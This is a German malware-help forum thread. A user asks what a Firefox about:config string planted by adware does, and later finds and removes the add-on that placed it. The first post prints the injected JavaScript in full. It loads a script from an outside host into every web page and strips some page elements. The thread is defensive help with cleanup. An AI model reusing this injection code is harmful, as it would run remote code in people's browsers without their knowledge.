Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? (https://www.trojaner-board.de/139629-schaedling-string-wert-firefox-about-config-erstellt-bewirkt-eintrag.html)

mb78 10.08.2013 21:24

Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?
 
Hallo,

nachdem ich hier schon öfter Hilfe ohne neuen Thread finden konnte habe ich jetzt doch eine Frage.
Ich habe mir einen Schädling eingefangen der einen String Wert im Firefox erstellt.
Die Entfernung läuft gerade, mich würde aber interessieren was der Eintrag genau bewirkt.
Klingt nach Programmier- oder Scriptsprache.

Die geänderte Einstellung heißt:
extensions.FaMbl.scode

Der Typ ist wie gesagt
String

Der genaue Wert ist sehr lang und lautet:

Code:

if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//i.74055djs.info/74055d/javascript.js?channel=p714&hid=0';document.getElementsByTagName("head")[0].appendChild(script);};if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}
Ich kann erkennen dass er irgendwelche Elemente holen soll (get) wenn (if) eine Bedingung erfüllt ist.
Was hier nun aber genau passieren soll ist mir ein Rätsel. :confused:
Würde mich über Aufklärung freuen.

Den Weg zur Entfernung habe ich hier gefunden: h**p://www.technicalforum.org/windows/my-web-browser-firefox-getting-slow-status-bar-shows-connecting-i74055djsinfo
Interessant ist dass man ohne Schädlingssuche den Wert zwar zurücksetzen kann er aber nach Neustart des Firefox wieder wie oben beschrieben erscheint.

schrauber 10.08.2013 21:30

hi,

bin kein Programmierer, also kann ich bei dem Code nicht helfen, aber bei der Bereinigung.

mb78 11.08.2013 04:36

Danke, klingt gut.
Ich versuche erst mal den Weg den ich gefunden habe.
Falls dieser nicht den gewünschten Effekt bringt gebe ich Rückmeldung.

[edit]Ok, Javascript...[/edit]

Hm........mit Avast gescannt, neun Bedrohungen entfernt, Malwarebytes Anti Malware hat auch noch eine gefunden......und trotzdem stellt sich der String Wert nach Zurücksetzen immer wieder um. :headbang:
Im Moment läuft der Housecall von Trendmicro.
Wäre es sinnvoll die Scans im abgesicherten Modus laufen zu lassen?

Ok, Problem gelöst.....war ein Firefox Addon installiert namens Savenshareee.
Dieses habe ich deinstalliert, Emisoft, Malwarebytes und Avast sind zufrieden und der String bleibt zurück gesetzt.

schrauber 11.08.2013 16:06

ok :)

mb78 11.08.2013 17:27

Nichtsdestotrotz würde mich immer noch interessieren was genau dieses Script nun getan hat.
Muss ich mir Sorgen um meine Daten machen?

schrauber 12.08.2013 07:46

Wie gesagt, bin kein Programmierer, aber dass das Teil Daten stiehlt halte ich für unwarscheinlich.


Alle Zeitangaben in WEZ +1. Es ist jetzt 22:13 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131